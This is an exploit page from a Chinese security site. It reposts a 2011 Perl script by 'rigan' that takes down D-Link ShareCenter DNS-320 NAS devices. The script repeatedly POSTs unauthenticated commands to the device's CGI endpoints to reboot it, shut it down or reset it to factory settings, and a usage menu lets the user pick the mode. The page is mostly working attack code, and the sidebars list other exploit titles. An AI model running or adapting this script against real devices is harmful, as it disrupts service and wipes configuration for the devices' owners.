首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ShareCenter D-Link DNS-320 Remote reboot/shutdown/reset (DoS)
来源:imrigan [sobachka] gmail.com 作者:rigan 发布时间:2011-12-06  

#!/usr/bin/perl
#
#  Title:  ShareCenter D-Link DNS-320 remote reboot/shutdown/reset (DoS).
#  Type:   Hardware
#  Remote: yes
#  Author: rigan - imrigan [sobachka] gmail.com

#  Tested on:
#  Firmware    : DNS320-v2.00b06
#
#  Security flaws:
#  dsk_mgr.cgi allows execute reboot via POST request with parameter cmd=FMT_restart.
#  system_mgr.cgi allows execute reboot via POST request with parameter cmd=cgi_restart or cmd=cgi_reboot.
#  system_mgr.cgi allows execte shutdown via POST request with parameter cmd=cgi_shutdown.
#  wizard_mgr.cgi allows to reset the firmware to default settings via POST request with parameter cmd=cgi_wizard.

use LWP::UserAgent;

print "[*] ShareCenter D-Link DNS-320 Remote Dos Exploit\n";

if (@ARGV != 3){ &usage; }

while (@ARGV > 0){
   $ip = shift(@ARGV);
   $port = shift(@ARGV);
   $mode = shift(@ARGV);
}

@cgi = ("dsk_mgr.cgi", "system_mgr.cgi", "wizard_mgr.cgi", "system_mgr.cgi");
@cmd = ("cmd=FMT_restart", "cmd=cgi_restart", "cmd=cgi_wizard", "cmd=cgi_shutdown");

$url = "http://".$ip.":".$port."/cgi-bin/".$cgi[$mode];

print "[*] DoS.............................................  \n";
while(1){
   my $ua = new LWP::UserAgent;
   my $req = HTTP::Request->new(POST=>$url);
   $req->content_type('application/x-www-form-urlencoded');
   $req->content($cmd[$mode]);
   my $res = $ua->request($req);
}

sub usage(){
   print "Usage: perl dlink.pl [target ip] [port] [0,1,2,3]  \n";
   print "=================================================  \n";
   print "0 - dsk_mgr.cgi cmd=FMT_restart [Reboot]           \n";
   print "1 - system_mgr.cgi cmd=cgi_restart [Reboot]        \n";
   print "2 - wizard_mgr.cgi cmd=cgi_wizard [Reset]          \n";
   print "3 - system_mgr.cgi cmd=shutdown [Shutdown]         \n";
   exit;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ms11-046 webshell 下exp 自己加
·SopCast 3.4.7 sop:// URI Handl
·SopCast 3.4.7 (Diagnose.exe) I
·Ability Server 2.34 STOR Comma
·Family Connections CMS v2.5.0-
·Family Connections less.php Re
·linux/x86-64 execve(/bin/sh) 5
·Traq <= 2.3 Authentication Byp
·NJStart Communicator MiniSmtp
·SMF <= 2.0.1 SQL Injection, Pr
·CCMPlayer 1.5 Stack based Buff
·Serv-U FTP Server <4.2 Buffer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved